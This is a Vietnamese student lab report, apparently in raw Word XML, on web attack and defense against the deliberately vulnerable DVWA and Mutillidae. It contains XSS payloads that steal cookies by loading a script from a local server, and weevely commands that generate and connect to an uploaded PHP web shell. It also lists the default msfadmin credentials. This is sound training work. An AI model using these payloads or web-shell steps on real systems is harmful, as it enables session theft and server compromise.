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05D10" w14:textId="7E8F9C3E" w:rsidR="00EA3C7F" w:rsidRDefault="00EA3C7F" w:rsidP="00E376CE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>LAB 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2341D5" w14:textId="0DD9F5C0" w:rsidR="00EA3C7F" w:rsidRDefault="00EA3C7F" w:rsidP="00E376CE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Web Attack and Defense (t</w:t>
      </w:r>
      <w:r>
        <w:t>t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA18150" w14:textId="337A646C" w:rsidR="00EA3C7F" w:rsidRPr="00EA3C7F" w:rsidRDefault="00EA3C7F" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3C7F">
        <w:t>Họ tên và MSSV:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3C7F">
        <w:t xml:space="preserve"> Trần Duy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kha 1050080139</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EABA59" w14:textId="796B519C" w:rsidR="00EA3C7F" w:rsidRPr="00EA3C7F" w:rsidRDefault="00EA3C7F" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EA3C7F">
        <w:t>Lớp</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3C7F">
        <w:t> :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3C7F">
        <w:t>K10-C</w:t>
      </w:r>
      <w:r>
        <w:t>NPM2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2EC71D" w14:textId="263A9C4A" w:rsidR="004019B6" w:rsidRDefault="00EA3C7F" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Link youtube</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="004019B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="004019B6" w:rsidRPr="008A3573">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/fY4-u_gccqo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4473E6AF" w14:textId="0B48353B" w:rsidR="00EA3C7F" w:rsidRDefault="00EA3C7F" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Câu 1: Khai thác lỗi Cross-site scripting (XSS) trên DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316694BB" w14:textId="255D6412" w:rsidR="00EA3C7F" w:rsidRDefault="00EA3C7F" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.1. Tham khảo các tài liệu đính kèm để khai thác lỗi Dom-based XSS trên DVWA (security ở</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mức</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>độ low) để lấy cookie của người dùng đang đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47648B0C" w14:textId="77777777" w:rsidR="00EA3C7F" w:rsidRDefault="00EA3C7F" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/mrudnitsky/dvwa-guide-2019/blob/master/low/Challenge%2010:%20XSS%20(DOM).md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77371F47" w14:textId="77777777" w:rsidR="00EA3C7F" w:rsidRDefault="00EA3C7F" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/#XSS_DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF5BA40" w14:textId="12180356" w:rsidR="00EA3C7F" w:rsidRDefault="00EA3C7F" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="006170E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/X87Ubv-qDm4?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20B9DD0E" w14:textId="662F69CF" w:rsidR="00EA3C7F" w:rsidRDefault="00A67CD3" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A67CD3">
        <w:t>- Mở trang DVWA và chọn XSS, nhập thanh địa chỉ như trong hình bên dưới:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7440A76D" w14:textId="0291A64E" w:rsidR="00A67CD3" w:rsidRDefault="00A67CD3" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A67CD3">
        <w:t>localhost/vulnerabilities/xss_d/?default=&lt;script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134C1D7A" w14:textId="7C753FFB" w:rsidR="00A67CD3" w:rsidRDefault="00A67CD3" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00A67CD3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="392486D5" wp14:editId="49555C97">
            <wp:extent cx="4715533" cy="1267002"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="175384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47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BB76" w14:textId="7A46C70E" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009C2113">
        <w:t>python3 -m http.server 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FB7CE8" w14:textId="67B8D2F9" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="388281B6" wp14:editId="01B6E223">
            <wp:extent cx="4619625" cy="1190625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="200385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57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F563" w14:textId="77777777" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7624AFE9" w14:textId="77777777" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01014334" w14:textId="77777777" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32BDBCED" w14:textId="20AAC0F9" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Suno a.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B370DC" w14:textId="0F29EC45" w:rsidR="00A67CD3" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009C2113">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5659C5F1" wp14:editId="4D0B9534">
            <wp:extent cx="4648849" cy="1762371"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="17478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9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AF12" w14:textId="66A12420" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EF3BDF6" wp14:editId="77CB5424">
            <wp:extent cx="1971675" cy="495300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="30271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13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32B2" w14:textId="065CA7D6" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009C2113">
        <w:t>localhost/vulnerabilities/xss_d/?default=&lt;script src="http://</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2113">
        <w:t>:9999/a.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AF4493" w14:textId="5563AF89" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009C2113">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C520996" wp14:editId="2246B222">
            <wp:extent cx="4896533" cy="1295581"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94419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90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3E5E" w14:textId="29B30602" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.2. Tham khảo các tài liệu đính kèm để khai thác lỗi Stored XSS trên DVWA (security ở mức độ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>low) để lấy cookie của người dùng đang đăng nhập. Sau đó dùng công cụ Burp Suite (hoặc chức</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>năng Inspect trên Firefox) để truy cập vào DVWA sử dụng cookie vừa lấy được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E36A4D" w14:textId="77777777" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/mrudnitsky/dvwa-guide-2019/blob/master/low/Challenge%2012:%20XSS%20(Stored).md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F71D0C2" w14:textId="77777777" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/#XSS_Stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CC9F2B" w14:textId="7143ED43" w:rsidR="009C2113" w:rsidRDefault="009C2113" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="006170E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/P1I9UGpGdrU?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="448E1BBA" w14:textId="5D882863" w:rsidR="009C2113" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66206">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B8245AA" wp14:editId="73CF4067">
            <wp:extent cx="5943600" cy="1304925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="93467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77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4A3A" w14:textId="677B087E" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66206">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7601A6AE" wp14:editId="38646A68">
            <wp:extent cx="4848902" cy="1428949"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="180447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72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CDDA" w14:textId="13BD7B97" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66206">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673B0009" wp14:editId="5D7D399B">
            <wp:extent cx="4925112" cy="1457528"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="155406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0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A5B0" w14:textId="10339D39" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.3. Tham khảo mã nguồn (view source), giải thích ngắn gọn cách DVWA với security ở mức độ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>medium, high, impossible ngăn chặn tấn công khai thác lỗi Stored XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15503084" w14:textId="5559534D" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>- Medium: hàm strip_tags loại bỏ các thẻ HTML và PHP ra khỏi chuỗi và sẽ trả về chuỗi đã loại</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bỏ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hết các thẻ HTML và PHP trong $message. Hàm str_replace sẽ loại bỏ tất cả</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>&amp;lt;script&amp;gt;trong $name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790FB703" w14:textId="7A09F499" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>- High: hàm strip_tags loại bỏ các thẻ HTML và PHP ra khỏi chuỗi và sẽ trả về chuỗi đã loại bỏ hết</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>các thẻ HTML và PHP trong $message. Hàm addslashes() thêm một dấu gạch chéo ngược (\) phía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>trước ký tự đặc biệt: dấu nháy kép, dấu nháy đơn và dấu gạch chéo ngược trong $message.Loại</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>bỏ tất cả các kí tự mà script có và không cho phép chữ T trong https.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DDD08" w14:textId="00A8BCCF" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>- Impossible: Hàm htmlspecialchars () được triển khai lọc tất cả các ký tự nguy hiểm từ $message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>và $name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B35A0" w14:textId="3AE54728" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78DBC253" w14:textId="77777777" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174AFE70" w14:textId="77777777" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E67B920" w14:textId="77777777" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB982F9" w14:textId="77777777" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="094DFC6D" w14:textId="77777777" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BAE5AC1" w14:textId="77777777" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D85402B" w14:textId="77777777" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Câu 2: Khai thác lỗi File upload trên DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391CC254" w14:textId="560E1798" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Tham khảo các tài liệu đính kèm để khai thác lỗi File upload trên DVWA (security ở</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mức độ low) để chiếm shell của máy chạy DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F57E5F0" w14:textId="77777777" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>https://bughacking.com/dvwa-ultimate-guide-first-steps-and-walkthrough/#File_Upload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1CDE5D" w14:textId="77777777" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>https://github.com/mrudnitsky/dvwa-guide-2019/blob/master/low/Challenge%2005:%20File%20Upload.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381E73D7" w14:textId="49DEC8D5" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="006170E0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/K7XBQWAZdZ4?list=PLHUKi1UlEgOJLPSFZaFKMoexpM6qhOb4Q</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="383E7FB4" w14:textId="77777777" w:rsidR="00C66206" w:rsidRPr="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C66206">
        <w:t>weevely generate your-password legitfile.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621CBB2E" w14:textId="5B57F11A" w:rsidR="00C66206" w:rsidRDefault="00C66206" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C94B16" wp14:editId="60526042">
            <wp:extent cx="5619750" cy="1038225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="62866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7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BDC8" w14:textId="76CFF90C" w:rsidR="00C66206" w:rsidRDefault="009311DA" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009311DA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23924ADB" wp14:editId="6BF1A715">
            <wp:extent cx="5943600" cy="2613660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211316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65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9C85" w14:textId="4BEB80B0" w:rsidR="009311DA" w:rsidRDefault="009311DA" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009311DA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24B4B582" wp14:editId="3E9730B8">
            <wp:extent cx="5943600" cy="1780540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65697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6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B142" w14:textId="68AA349B" w:rsidR="000F6D2B" w:rsidRDefault="000F6D2B" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="000F6D2B">
        <w:lastRenderedPageBreak/>
        <w:t>weevely http://127.0.1.1/hackable/uploads/legitfile.php your-password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D780FE" w14:textId="49C3E826" w:rsidR="009311DA" w:rsidRDefault="000F6D2B" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BADE0FA" wp14:editId="1AF6961C">
            <wp:extent cx="5943600" cy="4086225"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1505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1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10AB" w14:textId="3D6DBA83" w:rsidR="000F6D2B" w:rsidRDefault="000F6D2B" w:rsidP="00C66206">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35990364" wp14:editId="0B272675">
            <wp:extent cx="5943600" cy="1390650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="141440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02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F3F" w14:textId="777F8D7D" w:rsidR="000F6D2B" w:rsidRDefault="000F6D2B" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.2. Tham khảo mã nguồn (view source), giải thích ngắn gọn cách DVWA với security ở mức độ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>medium, high, impossible ngăn chặn tấn công khai thác lỗi File upload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26018A73" w14:textId="628683EF" w:rsidR="000F6D2B" w:rsidRDefault="000F6D2B" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>- Medium: loại file được phép tải lên là image/jpeg bằng cách kiểm tra tên tệp, kích thước tệp,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>kiểu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tệp và lấy chuỗi sau dấu chấm “.” để lấy được loại file trong cú pháp thẻ img. Ví dụ: &amp;lt;img src=&amp;quot;img_girl.jpg&amp;quot; alt=&amp;quot;Girl in a jacket&amp;quot; width=&amp;quot;500&amp;quot; height=&amp;quot;600&amp;quot;&amp;gt; sẽ lấy được jpg.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9BAEA" w14:textId="77777777" w:rsidR="000F6D2B" w:rsidRDefault="000F6D2B" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>- High: kiểm tra có phải là ảnh không nếu không thì không tải lên bằng cách phân tích các thông</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tin file, cho phép jpg, jpge, png file.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B51F9F" w14:textId="6FE12873" w:rsidR="000F6D2B" w:rsidRDefault="000F6D2B" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>- Impossible: có nhiều biện pháp bảo mật làm cho việc tải file không phải ảnh là không thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD95D3B" w14:textId="77777777" w:rsidR="000F6D2B" w:rsidRDefault="000F6D2B" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="528B5A7B" w14:textId="77777777" w:rsidR="000F6D2B" w:rsidRDefault="000F6D2B" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Câu 4: Sử dụng công cụ OWASP ZAP để tìm lỗ hổng bảo mật của ứng dụng web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471AF37B" w14:textId="77777777" w:rsidR="000F6D2B" w:rsidRDefault="000F6D2B" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>4.1. Sửa lỗi cấu hình cơ sở dữ liệu của Mutillidae trên máy ảo Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09826EEC" w14:textId="7D3A7055" w:rsidR="000F6D2B" w:rsidRDefault="004339AB" w:rsidP="000F6D2B">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="008A3573">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nudesystems.com/fix-mutillidae-da</w:t>
        </w:r>
        <w:r w:rsidRPr="008A3573">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>t</w:t>
        </w:r>
        <w:r w:rsidRPr="008A3573">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>abase-error-in-metasploitable-2/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5C1C4063" w14:textId="77777777" w:rsidR="006667F6" w:rsidRPr="006667F6" w:rsidRDefault="006667F6" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006667F6">
        <w:t xml:space="preserve">Sử dụng thông tin đăng nhập mặc định: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DEF892" w14:textId="77777777" w:rsidR="006667F6" w:rsidRPr="006667F6" w:rsidRDefault="006667F6" w:rsidP="006667F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006667F6">
        <w:t xml:space="preserve">Username: msfadmin </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB2FD3B" w14:textId="2BCF6AB6" w:rsidR="006667F6" w:rsidRDefault="006667F6" w:rsidP="006667F6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006667F6">
        <w:t>Password: msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F940DDA" w14:textId="5A0F155A" w:rsidR="006667F6" w:rsidRDefault="006667F6" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006667F6">
        <w:t>cd /var/www/mutillidae</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0955D2DF" w14:textId="33D29038" w:rsidR="006667F6" w:rsidRDefault="00F812BB" w:rsidP="006667F6">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
